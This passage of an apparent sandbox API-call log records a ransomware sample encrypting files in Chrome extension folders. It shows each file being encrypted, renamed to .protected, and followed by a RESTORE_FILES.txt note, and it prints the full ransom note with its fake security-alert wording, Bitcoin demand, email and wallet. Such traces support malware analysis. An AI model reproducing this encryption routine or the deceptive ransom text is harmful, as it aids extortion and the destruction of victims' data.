data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\messages.json.protected")) returned 1 [0079.868] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.868] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.868] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\RESTORE_FILES.txt") returned 161 [0079.868] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.869] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.869] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.869] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.869] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.870] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.870] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.870] CloseHandle (hObject=0x164) returned 1 [0079.870] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.870] lstrcmpiW (lpString1="sl", lpString2="Windows") returned -1 [0079.870] lstrcmpiW (lpString1="sl", lpString2="Program Files") returned 1 [0079.870] lstrcmpiW (lpString1="sl", lpString2="Program Files (x86)") returned 1 [0079.870] lstrcmpiW (lpString1="sl", lpString2="$Recycle.bin") returned 1 [0079.870] lstrcmpiW (lpString1="sl", lpString2="System Volume Information") returned -1 [0079.870] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl") returned 143 [0079.870] lstrcmpW (lpString1="sl", lpString2=".") returned 1 [0079.870] lstrcmpW (lpString1="sl", lpString2="..") returned 1 [0079.870] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\*") returned 145 [0079.870] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.870] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.870] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.870] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.870] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.871] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.871] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\.") returned 145 [0079.871] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.871] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.871] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.871] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.871] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.871] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.871] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.871] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\..") returned 146 [0079.871] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.871] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.871] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.871] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.871] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.871] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.871] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.871] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.871] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\messages.json") returned 157 [0079.871] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.871] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.871] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.871] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.871] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.872] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\messages.json") returned 157 [0079.872] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.872] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\messages.json") returned 157 [0079.872] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.872] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\messages.json") returned 157 [0079.872] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.872] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.873] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.873] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.873] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.873] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.873] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.873] CloseHandle (hObject=0x168) returned 1 [0079.873] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\messages.json.protected") returned 167 [0079.873] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\messages.json.protected")) returned 1 [0079.874] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.874] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.874] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\RESTORE_FILES.txt") returned 161 [0079.874] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.875] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.875] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.876] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.876] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.876] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.876] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.876] CloseHandle (hObject=0x164) returned 1 [0079.876] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.876] lstrcmpiW (lpString1="sr", lpString2="Windows") returned -1 [0079.876] lstrcmpiW (lpString1="sr", lpString2="Program Files") returned 1 [0079.876] lstrcmpiW (lpString1="sr", lpString2="Program Files (x86)") returned 1 [0079.876] lstrcmpiW (lpString1="sr", lpString2="$Recycle.bin") returned 1 [0079.876] lstrcmpiW (lpString1="sr", lpString2="System Volume Information") returned -1 [0079.876] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr") returned 143 [0079.876] lstrcmpW (lpString1="sr", lpString2=".") returned 1 [0079.876] lstrcmpW (lpString1="sr", lpString2="..") returned 1 [0079.876] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\*") returned 145 [0079.876] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.877] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.877] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.877] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.877] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.877] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.877] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\.") returned 145 [0079.877] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.877] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.877] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.877] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.877] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.877] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.877] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.878] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\..") returned 146 [0079.878] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.878] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.878] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.878] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.878] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.878] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.878] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.878] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.878] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\messages.json") returned 157 [0079.878] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.878] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.878] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.878] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.878] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.878] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\messages.json") returned 157 [0079.879] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.879] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\messages.json") returned 157 [0079.879] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.879] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\messages.json") returned 157 [0079.879] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.879] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.880] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.880] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.880] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.880] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.880] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.880] CloseHandle (hObject=0x168) returned 1 [0079.880] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\messages.json.protected") returned 167 [0079.881] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\messages.json.protected")) returned 1 [0079.881] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.881] FindClose (in: 